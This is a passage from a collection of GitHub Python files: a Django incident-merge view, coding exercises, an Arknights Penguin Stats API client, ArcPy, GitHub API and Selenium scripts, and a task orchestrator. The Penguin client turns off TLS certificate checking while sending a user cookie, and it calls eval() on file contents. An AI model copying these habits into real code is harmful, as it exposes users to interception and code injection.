\"\"\"\n primary_case = self.get_object()\n secondary_case = self.get_queryset().filter(pk=kwargs['pk2']).first()\n if not secondary_case:\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n with transaction.atomic():\n secondary_case.keyactivity_set.update(incident=primary_case)\n secondary_case.keydocument_set.update(incident=primary_case)\n primary_case.related_cases.add(*secondary_case.related_cases.all())\n secondary_case.delete()\n return Response({'finished': True})\n\n\nclass RelatedIncidentViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = aci_models.Incident.objects.active().select_related(\n 'primary_reporter', 'primary_incident_type', 'primary_involvement', 'resolution', 'status')\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.RelatedIncidentSerializer\n\n\nclass IncidentMergeView(views.APIView):\n queryset = aci_models.Incident.objects.active().select_related(\n 'primary_reporter', 'primary_incident_type', 'primary_involvement', 'resolution', 'status')\n permission_classes = [permissions.IsAuthenticated]\n serializer_class = serializers.IncidentSerializer\n\n def get(self, *args, **kwargs):\n main_case = 
self.validate_incident(int(kwargs.get('pk1')))\n secondary_case = self.validate_incident(int(kwargs.get('pk2')))\n main_case = self.serializer_class(main_case).data\n secondary_case = self.serializer_class(secondary_case).data\n\n for field in ('related_cases', 'suspects', 'reporters', 'animals', 'incident_type', 'involvement'):\n main_case[field] = self.merge_lists(main_case[field], secondary_case[field])\n for field in ('author', 'is_highlighted', 'primary_suspect', 'primary_reporter', 'status',\n 'resolution', 'primary_incident_type', 'primary_involvement', 'origin'):\n main_case[field] = self.merge_simple_value(main_case[field], secondary_case[field])\n\n self.merge_location(main_case, secondary_case)\n self.set_dates(main_case, secondary_case, 'created')\n\n main_case['notes'] = '{} {}'.format(main_case['notes'], secondary_case['notes']).strip() or ''\n return Response(main_case)\n\n def validate_incident(self, pk):\n incident = self.queryset.filter(pk=pk).first()\n if not incident:\n raise exceptions.NotFound('Incident with id=%s does not exist' % str(pk))\n return incident\n\n def merge_simple_value(self, main_value, secondary_value):\n # return first not null\n return main_value or secondary_value\n\n def merge_lists(self, main_values, secondary_values):\n ids = [el.get('id') for el in main_values]\n for value in secondary_values:\n if value['id'] not in ids:\n main_values.append(value)\n return main_values\n\n def merge_location(self, main_case, secondary_case):\n location_fields = ('location_desc', 'street', 'city', 'state', 'zip_code', 'county', 'jurisdictional_agency')\n location_exists = [main_case[field] for field in location_fields if main_case[field]]\n if not location_exists:\n for field in location_fields:\n if secondary_case[field]:\n main_case[field] = secondary_case[field]\n return main_case\n\n def set_dates(self, main_case, secondary_case, field):\n main_date = parse(main_case[field])\n secondary_date = parse(secondary_case[field])\n if secondary_date < main_date:\n main_case[field] = secondary_case[field]\n return main_case\n","repo_name":"Fibio/examples21","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27483766628","text":"#!/usr/bin/env python3\nimport sys\n#Find the string count of a string\n\ndef main():\n s = input(\"Enter a string to search: \")\n a = input(\"Enter a string to look: \")\n if not (type(s) == str and len(s.strip()) > 0):\n sys.stderr.write(\"Please input a valid string!\")\n exit(1)\n elif not (type(a) == str and len(a.strip()) > 0):\n sys.stderr.write(\"Please input a valid string!\")\n exit(1)\n # Find and display the Highest Common Factor\n s, a = str(s).strip(), str(a).strip()\n print(\"The count of the part[%s] inside a string[%s] => %s\" % (a, s, count(s, a)))\n\ndef count(s, a):\n if not s: #Base case 1\n return 0\n elif not a: #Base case 2\n return 0\n else:\n if s.startswith(a):\n return 1 + count(s[len(a):len(s)], a)\n else:\n return count(s[1:len(s)], a)\n\nmain() # Call the main function","repo_name":"jsdnhk/python-recursion-exercise","sub_path":"q10.py","file_name":"q10.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12106007654","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n\t\t#some var \n result, break_loop, word = \"\", False, 
0\n\t\t#looping for every letter(character)\n for letter in range(len(strs[0])):\n\t\t#looping for every word in the list\n for word in range(len(strs)-1):\n\t\t\t\t#the condition to stop searching\n try:\n if strs[word][letter] != strs[word+1][letter]:\n break_loop = True\n break\n except IndexError:\n break_loop = True\n break\n if break_loop:\n break\n\t\t\t#save the character \n result += strs[word][letter]\n return result\n","repo_name":"abhinav1912/LeetCode","sub_path":"Longest Common Prefix.py","file_name":"Longest Common Prefix.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31625720895","text":"# coding:utf8\nimport requests\nfrom PyQt5.QtGui import QGuiApplication\nimport json\nimport base64\nimport os\nimport urllib3\n\nurllib3.disable_warnings()\nDROP_TYPE = {'NORMAL_DROP': '常规掉落', 'EXTRA_DROP': '额外掉落',\n 'SPECIAL_DROP': '特殊掉落', 'FURNITURE': '家具掉落'}\n\n\nclass Penguin(object):\n \"\"\"企鹅统计相关api\"\"\"\n header = {'User-Agent': 'ozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.44 Safari/537.36 Edg/83.0.478.28',\n 'accept': 'application/json, text/plain, */*', 'origin': 'https://penguin-stats.cn', }\n report_url = 'https://penguin-stats.cn/PenguinStats/api/v2/report'\n plan_url = 'https://planner.penguin-stats.io/plan'\n\n def __init__(self, uid=None):\n super(Penguin, self).__init__()\n self.cookies = {'userID': ''}\n self.required = {'exclude': [], \"required\": {}, \"owned\": {\n }, \"extra_outc\": False, \"exp_demand\": False, \"gold_demand\": False}\n self.report_json = {'server': 'CN', 'stageId': '', 'drops': []}\n\n# 添加掉落汇报数据\n def update_report(self, stageId, drop_type, itemid, quantity):\n if self.report_json['stageId'] and stageId != self.report_json['stageId']:\n return None\n self.report_json['stageId'] = stageId\n self.header[\n 'Referer'] = f'https://penguin-stats.cn/report/{Penguin.get_zoneId_by_stageId(stageId)}/{stageId}'\n self.report_json['drops'].append(\n {'dropType': drop_type, 'itemId': itemid, 'quantity': quantity})\n with open(r'.\\temp_Data\\report.txt', 'w', encoding='utf8') as f:\n f.write(str(self.report_json))\n return True\n\n# 移除掉落汇报物品\n def remove_report(self, itemid: str = None, stage: str = None):\n if stage:\n self.report_json['stageId'] = ''\n self.header['Referer'] = ''\n for drop in self.report_json['drops']:\n if itemid == drop['itemId']:\n self.report_json['drops'].remove(drop)\n with open(r'.\\temp_Data\\report.txt', 'w', encoding='utf8') as f:\n f.write(str(self.report_json))\n return True\n else:\n return None\n\n# 汇报数据,返回哈希值\n def report(self):\n if not self.cookies['userID']:\n return 'no userID'\n if not self.report_json['drops']:\n return 'no drops'\n r = requests.post(\n self.report_url, json=self.report_json,\n headers=self.header, verify=False, cookies=self.cookies)\n if r.status_code == 201:\n self.report_json['drops'] = []\n self.report_json['stageId'] = ''\n os.remove(r'.\\temp_Data\\report.txt')\n return r.json()['reportHash']\n else:\n return None\n\n# 上传企鹅统计ID\n def update_id(self, uid):\n self.cookies['userID'] = uid\n\n# 删除企鹅统计ID\n def remove_id(self, uid):\n if uid == self.cookies['userID'] and self.cookies['userID']:\n self.cookies.pop('userID')\n return True\n else:\n return None\n\n# 添加刷图规划材料\n def update_need(self, name: str, count: int):\n self.required['required'][name] = count\n with open(r'.\\temp_Data\\need.txt', 'w', encoding='utf8') as f:\n 
f.write(str(self.required))\n\n# 移除刷图规划材料\n def remove_need(self, name: str):\n if name in self.required['required']:\n self.required['required'].pop(name)\n with open(r'.\\temp_Data\\need.txt', 'w', encoding='utf8') as f:\n f.write(str(self.required))\n return True\n else:\n return None\n\n# 规划\n def plan(self, out: False, exp: False, gold: False):\n self.required['extra_outc'] = out\n self.required['exp_demand'] = exp\n self.required['gold_demand'] = gold\n if not self.required['required']:\n return None\n QGuiApplication.processEvents()\n r = requests.post(\n self.plan_url, json=self.required,\n headers=self.header, verify=False, cookies=self.cookies)\n if r.status_code == 200:\n self.required['required'] = {}\n os.remove(r'.\\temp_Data\\need.txt')\n return r.json()\n else:\n return None\n\n# 格式化计划结果\n @staticmethod\n def format_plan(plan):\n if not plan:\n return None\n format_text = ''\n cost = str(plan['cost'])\n exp = str(plan['exp'])\n gold = str(plan['gold'])\n format_text += '预计理智花费: '+cost+'\\n'\n format_text += '预计获得经验: '+exp+'\\n'\n format_text += '预计龙门币收入: '+gold+'\\n'\n stages = [\n '运行:'+' '+x['stage']+' ' + x['count']+' '+'次' for x in plan['stages']]\n synthesis = [\n '合成:'+' '+x['target']+' ' + x['count']+' '+'次' for x in plan['syntheses']]\n for stage in stages:\n format_text += stage+'\\n'\n for synthesi in synthesis:\n format_text += synthesi+'\\n'\n return format_text\n\n# code转换zoneId\n @staticmethod\n def get_zoneId_by_code(code: str):\n data = Penguin.get_stage()\n return [x['zoneId'] for x in data if code == data['code']]\n\n# stageID转换zoneId\n @staticmethod\n def get_zoneId_by_stageId(stageId: str):\n data = Penguin.get_stage()\n return [x['zoneId'] for x in data if stageId == x['stageId']][0]\n\n# code转换stageId\n @staticmethod\n def get_stageId_by_code(code: str):\n data = Penguin.get_stage()\n return [x['stageId'] for x in data if code == x['code']][0]\n\n# 获取当前刷图规划需求物品\n @staticmethod\n def get_need_names():\n with open(r'.\\temp_Data\\need.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return [x[0] for x in data['required'].items()]\n\n# 获取当前掉落汇报的关卡\n @staticmethod\n def get_report_stage():\n with open(r'.\\temp_Data\\report.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return data['stageId']\n\n# 获取当前掉落汇报的物品\n @staticmethod\n def get_report_items():\n with open(r'.\\temp_Data\\report.txt', 'r', encoding='utf8') as f:\n data = eval(f.read())\n return [x['itemId'] for x in data['drops']]\n\n# 获取所有物品数据\n @ staticmethod\n def get_items():\n data = eval(open(r'.\\Data\\items.json', 'r', encoding='utf8').read())\n return data\n\n# droptype英文转中文\n @ staticmethod\n def droptype_to_CN(dp: str):\n return DROP_TYPE[dp]\n\n# droptype中文转英文\n @ staticmethod\n def droptype_to_EN(dp: str):\n return [x[0] for x in DROP_TYPE.items() if dp in x[1]][0]\n\n# 物品id转换为物品名\n @ staticmethod\n def itemid_to_name(id: str):\n data = Penguin.get_items()\n item_name = [x['name'] for x in data if id in x.values()]\n if item_name:\n return item_name[0]\n\n# 物品名转换为物品id\n @ staticmethod\n def name_to_itemid(name: str):\n data = Penguin.get_items()\n item_id = [x['itemId'] for x in data if name in x.values()]\n if item_id:\n return item_id[0]\n\n# 获取关卡中掉落的物品id\n @ staticmethod\n def get_stage_itemId(stage: str):\n drop_infos = Penguin.get_dropinfos(stage)\n for x in drop_infos:\n item_id = [y['itemId'] for y in x if 'itemId' in y.keys()]\n return item_id\n\n# 按照掉落类型获取关卡中掉落的物品id\n @ staticmethod\n def get_stage_itemId_by_droptype(stage: str, drop_type: str):\n 
drop_infos = Penguin.get_dropinfos(stage)\n for x in drop_infos:\n item_id = [\n y['itemId']for y in x if drop_type in y.values() and 'itemId' in y.keys()]\n return item_id\n\n# 获取所有关卡掉落信息\n @ staticmethod\n def get_dropinfos(stage: str):\n data = Penguin.get_stage()\n drop_infos = [\n x['dropInfos']for x in data if 'dropInfos' in x.keys() and stage in x.values()]\n return drop_infos\n\n# 获取关卡中所有掉落物品类型\n @staticmethod\n def get_droptype(stage: str):\n data = Penguin.get_dropinfos(stage)\n for x in data:\n drop_type = [y['dropType'] for y in x]\n if drop_type:\n return list(set(drop_type))\n else:\n return []\n\n# 获取所有关卡code\n @staticmethod\n def get_stage_code():\n data = json.loads(\n open(r'.\\Data\\stage.json', 'r', encoding='utf8').read())\n return [x['code'] for x in data if 'dropInfos' in x.keys()]\n\n# 获取所有关卡数据\n @staticmethod\n def get_stage(server: str = 'CN'):\n data = json.loads(\n open(r'.\\Data\\stage.json', 'r', encoding='utf8').read())\n return data\n\n# 更新本地关卡信息\n @staticmethod\n def down_stage(server: str = 'CN'):\n r = requests.get(\n 'https://penguin-stats.io/PenguinStats/api/v2/stages?server={server}')\n result = str(r.json())\n with open(r'.\\Data\\stage.json', 'w', encoding='utf8') as f:\n f.write(result)\n\n# 更新本地物品信息\n @staticmethod\n def down_items():\n r = requests.get('https://penguin-stats.io/PenguinStats/api/v2/items')\n result = str(r.json())\n with open(r'.\\Data\\items.json', 'w', encoding='utf8') as f:\n f.write(result)\n","repo_name":"Inull-Studio/AutoArknights","sub_path":"Core/Material.py","file_name":"Material.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"72297373635","text":"# Step 3 - Python Script from Tools\n\nimport os, arcpy\nfrom arcpy.sa import *\nlistMonths = [\"02\", \"04\", \"05\", \"07\", \"10\", \"11\"]\noutputDirectory = \"C:/data/d1/6/ALL_Files/Step_3_data_lfs/NVDI\"\nif not os.path.exists(outputDirectory):\n os.mkdir(outputDirectory)\n\nfor month in listMonths:\n arcpy.env.workspace = r\"C:\\data\\d1\\6\\All_Files\\Step_3_data_lfs\\2015\" + month\n listRasters = arcpy.ListRasters(\"*\", \"TIF\")\n visRaster = [x for x in listRasters if (\"T1_B4\") in x]\n print(\"For vistion Rasters in month: \" + month + \", there are: \" + str(len(visRaster)) + \" bands to process.\")\n nirRaster = [x for x in listRasters if (\"T1_B5\") in x]\n print(\"For NIR Rasters in month: \" + month + \", there are: \" + str(len(nirRaster)) + \" bands to process.\")\n output_raster = \"NVDI\"+month\n output_raster = (Raster(nirRaster[0]) - Raster(visRaster[0])) / (Raster(nirRaster[0]) + Raster(visRaster[0]))\n output_raster.save(os.path.join(outputDirectory, \"2015_\" + month + \"_NVDI.tif\"))\n \n\n","repo_name":"nickcurci/ArcPy","sub_path":"CodingChallenges/6 - Week_Six/1- Coding Challenge One For Week6.py","file_name":"1- Coding Challenge One For Week6.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"38623720989","text":"import random\r\ndef get_choices():\r\n player_choice=input(\" Enter a choice('Rock','Paper','Scissor') :\")\r\n option=[\"Rock\",\"Paper\",\"Scissor\"]\r\n computer_choice=random.choice(option)\r\n choices={\"Player\":player_choice, \"Computer\":computer_choice}\r\n return choices\r\n\r\ndef check_win(Player,Computer):\r\n #print(\"your choice is \"+ Player+ \" , & computer choice is \"+Computer)\r\n print(f\"your choice is 
{Player} & computer choice is {Computer}\")\r\n if Player==Computer:\r\n print(\"it is a tie!\")\r\n elif Player==\"Rock\" and Computer==\"Paper\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Paper\" and Computer==\"Scissor\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Scissor\" and Computer==\"Rock\":\r\n print(\"Here, Computer is winner.\")\r\n elif Player==\"Rock\" and Computer==\"Scissor\":\r\n print(\"Here, you are winner.\")\r\n elif Player==\"Scissor\" and Computer==\"Paper\":\r\n print(\"Here, you are winner.\")\r\n elif Player==\"Paper\" and Computer==\"Rock\":\r\n print(\"Here, you are winner.\")\r\n else:\r\n print(\"Sorry, no one are winner.\")\r\nChoice=get_choices()\r\nresult=check_win(Choice[\"Player\"], Choice[\"Computer\"])\r\nprint(result)\r\n\r\n\r\n","repo_name":"MANGUKIYANIRAJB/My_codes","sub_path":"rock_paper_Scissor_game.py","file_name":"rock_paper_Scissor_game.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10194749196","text":"import base64\nimport time\n\nfrom utils.web_interactive import WebInteractive as wi\n\n\nclass GitHub:\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/commits')\n def _commits(user, repo, sha=None, path=None, author=None, since=None, until=None):\n params = locals()\n for k in ['user', 'repo']:\n params.pop(k)\n req_data = {\n 'url_args': (user, repo),\n 'params': params,\n }\n return req_data\n\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/git/trees/%s')\n def _git_trees(user, repo, sha, recursive=None):\n params = locals()\n for k in ['user', 'repo', 'sha']:\n params.pop(k)\n req_data = {\n 'url_args': (user, repo, sha),\n 'params': params,\n }\n return req_data\n\n @staticmethod\n @wi.response('json')\n @wi.request('GET', 'https://api.github.com/repos/%s/%s/git/blobs/%s')\n def _git_blobs(user, repo, sha):\n req_data = {\n 'url_args': (user, repo, sha),\n }\n return req_data\n\n @staticmethod\n def get_commits(user, repo, sha=None):\n raw_commits = GitHub._commits(user, repo, sha)\n\n commits = []\n for rc in raw_commits:\n info = rc['commit'] # type: dict\n date = time.strptime(info['author']['date'], '%Y-%m-%dT%H:%M:%SZ')\n item = {\n 'sha': rc['sha'],\n 'sha_tree': info['tree']['sha'],\n 'date': time.strftime('%Y-%m-%d %H:%M:%S', date),\n 'message': info['message'],\n }\n commits.append(item)\n\n rc_last = raw_commits[-1]\n if len(rc_last['parents']) != 0:\n parent = rc_last['parents'][0]\n next_commits = GitHub.get_commits(user, repo, parent['sha'])\n for nc in next_commits:\n commits.append(nc)\n\n return commits\n\n @staticmethod\n def get_trees(user, repo, sha, recursive=1):\n raw_trees = GitHub._git_trees(user, repo, sha, recursive) # type: dict\n\n if 'tree' in raw_trees:\n trees = []\n for rt in raw_trees['tree']:\n item = {\n 'path': rt['path'],\n 'type': rt['type'],\n 'sha': rt['sha'],\n }\n if item['type'] == 'blob':\n item['size'] = rt['size']\n\n trees.append(item)\n\n if raw_trees['truncated']:\n next_trees = GitHub.get_trees(user, repo, sha, recursive + 1)\n for nt in next_trees:\n trees.append(nt)\n\n return trees\n\n @staticmethod\n def get_blobs(user, repo, sha):\n raw_blobs = GitHub._git_blobs(user, repo, sha)\n\n print(raw_blobs)\n size = raw_blobs['size']\n content = base64.b64decode(raw_blobs['content'])\n\n blobs = {\n 'size': size,\n 'content': content,\n 'validate': 
len(content) == size,\n }\n\n return blobs\n","repo_name":"HsOjo/ResourceUpdateTest","sub_path":"api/github.py","file_name":"github.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72906445315","text":"import os\nimport json\nfrom sec_automation.datamanager import DataManager \nimport sec_automation.configmanager as cm\nimport importlib\nfrom sys import exit\nfrom copy import deepcopy\n#from app.data.gcp_data import gcp_data\n\n\nimport logging\nlogger = logging.getLogger(__name__)\n# ch = logging.StreamHandler() # console handler\n# ch.setLevel(logging.DEBUG)\n# formatter = logging.Formatter('%(levelname)s - %(name)s - %(message)s') \n# ch.setFormatter(formatter) # add formatter\n\n# # add ch & fh to logger\n# logger.addHandler(ch)\n\nclass Orchestrator():\n def __init__(self):\n self.options=cm.data_options()\n self.dm = DataManager()\n logger.debug(\"orchestrator instantiation complete\")\n\n def getdata(self,command=None, datatype=None):\n logger.debug(\"start of Orchestrator getData function\")\n data_array = []\n if command==None and datatype==None:\n logger.error(\"You must specify either a Command or Datatype\")\n raise Exception(\"You must specify either a Command or Datatype\")\n try:\n if command != None and self.validate_command(command):\n # pull list of required datatypes for this command\n datatypes=self.options['commands'][command]['datatypes']\n logger.debug(\"datatypes loaded for command: {}, datatypes: {}\".format(command,datatypes))\n # Iterate through datatypes to pull the data\n for dt in datatypes:\n #function to take datatype map it to a package and functiona and call this functions\n data = self.trigger_datatype_request(dt)\n logger.debug(\"data retrieved for datatype: {}\".format(dt))\n # some functions return an array of data. e.g. azure as we have multiple tenants\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.storefile(data,dt)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.storefile(data_object,dt)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. type: {}\".format(type(data)))\n exit(1)\n elif datatype != None and self.validate_datatype(datatype):\n data = self.trigger_datatype_request(datatype)\n # some functions return an array of data. e.g. azure as we have multiple tenants\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.storefile(data,datatype)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.storefile(data_object,datatype)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. 
type: {}\".format(type(data)))\n exit(1)\n logger.info(\"[Orchestrator.getData] Data Request Complete\")\n except Exception as e:\n logger.error(\"Unknown Error\")\n logger.error(e, exc_info=True)\n exit(1)\n\n def command(self, command=None):\n '''\n Function to gather data related to command and then run the command action without writing to disk\n '''\n logger.debug(\"start of Orchestrator command function\")\n data_array = []\n if command==None :\n logger.error(\"You must specify either a Command\")\n raise Exception(\"You must specify either a Command\")\n try:\n if command != None and self.validate_command(command):\n # pull list of required datatypes for this command\n datatypes=self.options['commands'][command]['datatypes']\n logger.debug(\"datatypes loaded for command: {}, datatypes: {}\".format(command,datatypes))\n # Iterate through datatypes to pull the data\n if len(datatypes)>0:\n for dt in datatypes:\n #function to take datatype map it to a package and functiona and call this functions\n data = self.trigger_datatype_request(dt)\n logger.debug(\"data retrieved for datatype: {}\".format(dt))\n # using deepcopy to ensure a pointer isn't returned\n if type(data) == dict:\n data_array.append(deepcopy(self.dm.cachefile(data,dt)))\n logger.debug(\"data stored\")\n elif type(data) == list:\n logger.info(\"Multiple data sets returned for datatype {}\".format)\n for data_object in data:\n data_array.append(deepcopy(self.dm.cachefile(data_object,dt)))\n logger.debug(\"data stored\")\n else:\n logger.error(\"unknown type for returned data. type: {}\".format(type(data)))\n exit(1)\n \n logger.info(\"[Orchestrator.command] Data Request Complete\")\n ###\n # Executing the command now that the data is gathered\n logger.info(\"[Orchestrator.command] Starting to action data\")\n \n for data in data_array:\n datatype = data['datatype']\n logger.info(\"[Orchestrator.dataaction] Actioning datatype {}\".format(datatype))\n app = self.options['commands'][command]['app']\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n else:\n # Action command that takes no data input\n logger.info(\"[Orchestrator.dataaction] Actioning command {} without any data\".format(command))\n app = self.options['commands'][command]['app']\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method()\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n except Exception as e:\n logger.error(\"Unknown Error\")\n logger.error(e, exc_info=True)\n exit(1)\n\n\n def dataaction(self,file_name=None, build_queue=False):\n 'Top level function which will be called by main package'\n if file_name==None and build_queue==False:\n logger.error(\"You must specify either file name or Build Queue\")\n raise Exception(\"You must specify either file name or Build Queue\")\n \n data = self.dm.loadfile(file_name)\n\n datatype = data['datatype']\n commands = cm.related_commands(datatype)\n for command in commands:\n app = self.options['commands'][command]['app']\n option = self.options['datatypes'][datatype]\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise 
NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n\n########################\n# Supporting Methods\n########################\n\n def action_data(data):\n datatype = data['datatype']\n commands = cm.related_commands(datatype)\n for command in commands:\n app = self.options['commands'][command]['app']\n option = self.options['datatypes'][datatype]\n module = importlib.import_module(app)\n try:\n method = getattr(module, command)\n except AttributeError:\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n method(data)\n logger.info(\"[Orchestrator.dataaction] Data Actions Complete\")\n\n def trigger_datatype_request(self,datatype):\n '''\n Functions to call the related function based on datatype. \n Intput is datatype as a string. \n\n The options file has a mapping between datatype and the related python module which pulls that datatype\n '''\n\n option = self.options['datatypes'][datatype]\n\n # reference: https://stackoverflow.com/questions/4821104/dynamic-instantiation-from-string-name-of-a-class-in-dynamically-imported-module\n # reference: https://stackoverflow.com/questions/7936572/python-call-a-function-from-string-name/7936588\n \n #Import package based on app name in mapping file\n module = importlib.import_module(option['app'])\n logger.info(\"loading module: {}\".format(module))\n try:\n method = getattr(module, datatype)\n data = method()\n except AttributeError:\n logger.critical(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n raise NotImplementedError(\"Class `{}` does not implement `{}`\".format(option['app'], datatype))\n return data\n\n def validate_command(self,command):\n valid=True\n if command not in self.options['commands']:\n valid = False\n logger.error(\"[Orchestrator.validate_command] Invalid Command {}\".format(command))\n raise Exception(\"[Orchestrator.validate_command] Invalid Command\")\n return valid\n\n def validate_datatype(self,datatype):\n valid=True\n if datatype not in self.options['datatypes'].keys():\n valid = False\n logger.error(\"[Orchestrator.validate_datatype] Invalid datatype {} -- Valid datatypes:{}\".format(datatype,self.options['datatypes'].keys()))\n raise Exception(\"[Orchestrator.validate_datatype] Invalid Datatype\")\n return valid\n","repo_name":"kvql/sec-automation-library","sub_path":"sec_automation/orchestrator.py","file_name":"orchestrator.py","file_ext":"py","file_size_in_byte":10898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"75093562114","text":"from celery_app import app\nfrom stream_manager import StreamManager\nfrom utils import fetch_streams\nimport redis\n\n\nstreams = fetch_streams()\nqueue_name = 'queue:clips'\nstream_mgr = StreamManager(app, streams, queue_name)\n\n\n@app.task(name='decoder.add_stream')\ndef add_stream(stream_prop):\n print('new stream recived')\n stream_mgr.add_new_stream(stream_prop)\n print('Stream: {} added'.format(stream_prop))\n\n@app.task(name='decoder.remove_stream')\ndef remove_stream(stream_id):\n res = stream_mgr.remove_stream(stream_id)\n print('stream {} {} removed'.format(stream_id, res))\n return 
res\n\n\n","repo_name":"BehnamSamadi/Real-Time-Video-Event-Analyzer","sub_path":"decoder/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"16013281068","text":"import random\nA=[]\nfor i in range(7):\n A.append([])\n for j in range(24):\n num=random.randint(5,33)\n A[i].append(num)\nprint('matriz A: ')\nfor i in range(7):\n print(A[i])\nmayor=A[0][0]\nmenor=A[0][0]\nfor i in A:\n for j in i:\n if j>mayor:\n mayor=j\n if jmayor:\n mayor=A[i][j]\n vecmay.append(mayor)\n mayor=0\nmaximo=max(vecmay)\nprint('el dia que se registro mayor temperatura fue :' ,maximo,'grados')","repo_name":"gustavofloresSz/trabajos-3er-parcial","sub_path":"Prac matrice-2/ejer14.py","file_name":"ejer14.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74582047873","text":"# x = list(map(int, input().split()))\r\n# target = int(input())\r\n#\r\n# for i in range(len(x)-1):\r\n# for j in range(i + 1, len(x)):\r\n# if x[i] + x[j] == target:\r\n# print([i, j])\r\n\r\ndef twosum(arr, target):\r\n x = []\r\n for i in range(len(arr)-1):\r\n for j in range(i+1, len(arr)):\r\n if arr[i]+arr[j]==target:\r\n x.append(i)\r\n x.append(j)\r\n break\r\n print(x)\r\n\r\narr = list(map(int, input().split()))\r\ntarget =int(input())\r\ntwosum(arr, target)","repo_name":"aryanxk02/HackerRank-Solutions","sub_path":"Problem Solving/two sum.py","file_name":"two sum.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72822252034","text":"from time import sleep\nfrom traceback import print_tb\nfrom turtle import down\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom rich.console import Console\nfrom rich.table import Table\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium import webdriver\nfrom selenium.webdriver.edge.service import Service\nfrom webdriver_manager.microsoft import EdgeChromiumDriverManager\nfrom uuid import uuid4\nimport os\nimport argparse\nos.environ['WDM_LOG'] = '0'\nparser = argparse.ArgumentParser()\nparser.add_argument('h', nargs='?', const=0, type=int)\nargs = parser.parse_args()\n\n\noptions = webdriver.EdgeOptions()\noptions.add_experimental_option('excludeSwitches', ['enable-logging'])\n# disable\n# options.add_experimental_option(\n# \"excludeSwitches\", [\"enable-automation\"])\n# options.add_experimental_option('useAutomationExtension', False)\noptions.add_argument('--disable-logging')\nif args.h:\n options.add_argument('--headless')\n\n\nprefs = {\"download.default_directory\": \"C:\\Tutorial\"}\noptions.add_experimental_option(\"prefs\", 
